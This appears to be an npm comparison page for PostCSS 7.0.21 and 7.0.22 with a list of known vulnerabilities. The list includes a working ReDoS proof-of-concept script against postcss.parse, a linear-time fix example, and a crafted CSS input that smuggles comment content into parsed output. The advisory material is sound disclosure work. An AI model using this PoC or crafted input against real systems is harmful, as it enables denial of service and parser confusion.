PostCSS is a powerful JavaScript tool for transforming CSS, empowering developers to extend and enhance their styling workflows with plugins. Versions 7.0.21 and 7.0.22, while seemingly close, present some notable differences. Both versions share the same core dependencies: chalk for colorful console output, source-map for debugging, and supports-color for terminal color detection. Core information like the MIT license, author Andrey Sitnik, and the source code repository remain consistent as well.
However, notable differences emerge in the details of their distribution packages. Version 7.0.22 has a smaller unpacked size of 600,232 bytes, a substantial reduction from version 7.0.21's 1,085,084 bytes. This reduction points to trimming in the codebase or in the resources shipped with the package, which shrinks the project's overall footprint and improves installation times, ultimately giving faster builds and deployments. The file count within the package also decreased, from 38 to 35, which likely accounts for part of the size reduction. Version 7.0.22 was released on November 18, 2019, succeeding version 7.0.21, which was released on October 25, 2019, so it includes around a month of fixes and enhancements. Developers should generally opt for the latest version (7.0.22) for the most up-to-date improvements and bug fixes.
All vulnerabilities related to version 7.0.22 of the package
Regular Expression Denial of Service in postcss
Versions of the postcss package before 7.0.36, or between 8.0.0 and 8.2.13, are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss");

// Builds "a{}" followed by n annotation openers and no closing "*/".
function build_attack(n) {
  var ret = "a{}";
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL=";
  }
  return ret + "!";
}

// Warm-up parse of a well-formed annotation comment.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */');

// Time the parser on progressively longer inputs.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i);
    try {
      postcss.parse(attack_str);
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
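The root cause is a pattern whose (.*) can backtrack across every repeated sourceMappingURL= marker when the comment is never closed. As an added example (not PostCSS's own code or its actual fix), the extractor below replaces the regex with forward string searches, so the work stays proportional to the input length; the function names and sample inputs are constructed for this illustration. It treats any "/*" as a comment start, so like the original pattern it does not account for "/*" inside CSS strings.

```javascript
// Added example: linear-time sourceMappingURL extraction without a backtracking regex.
// Names and inputs are constructed for this illustration; this is not PostCSS's code.
const MARK = "sourceMappingURL=";

// Returns the URL from the last complete "/*# sourceMappingURL=... */" comment,
// or null if there is none. Each step is a forward indexOf/slice, so repeated
// markers or an unterminated comment cannot trigger quadratic backtracking.
function extractSourceMapURL(css) {
  let url = null;
  let pos = 0;
  for (;;) {
    const open = css.indexOf("/*", pos);
    if (open === -1) break;
    const close = css.indexOf("*/", open + 2);
    if (close === -1) break; // unterminated comment: nothing further to parse
    const body = css.slice(open + 2, close).trim();
    if (body.startsWith("#")) {
      const rest = body.slice(1).trim();
      if (rest.startsWith(MARK)) url = rest.slice(MARK.length).trim();
    }
    pos = close + 2;
  }
  return url;
}

// Same shape as the PoC above: "a{}", n annotation openers, no closing "*/".
function unterminatedAnnotations(n) {
  return "a{}" + "/*# sourceMappingURL=".repeat(n) + "!";
}

// Runs the extractor and reports elapsed milliseconds alongside the result.
function timedExtract(css) {
  const start = Date.now();
  const url = extractSourceMapURL(css);
  return { url: url, ms: Date.now() - start, length: css.length };
}

// Constructed sample stylesheets
const normal = "a{}/*# sourceMappingURL=a.css.map */";
const twoMaps = "/*# sourceMappingURL=old.map */ b{} /*# sourceMappingURL=new.map */";
const plainComment = "a{} /* just a comment */";

console.log(extractSourceMapURL(normal));   // a.css.map
console.log(extractSourceMapURL(twoMaps));  // new.map
console.log(timedExtract(unterminatedAnnotations(200000)));
```

The last call processes a multi-megabyte input with no annotation closure and returns null in milliseconds, whereas the page's PoC shows the regex-based parser slowing down as the same input grows.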
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, that content is included in the PostCSS output in CSS nodes (rules, properties) despite originally being inside a comment.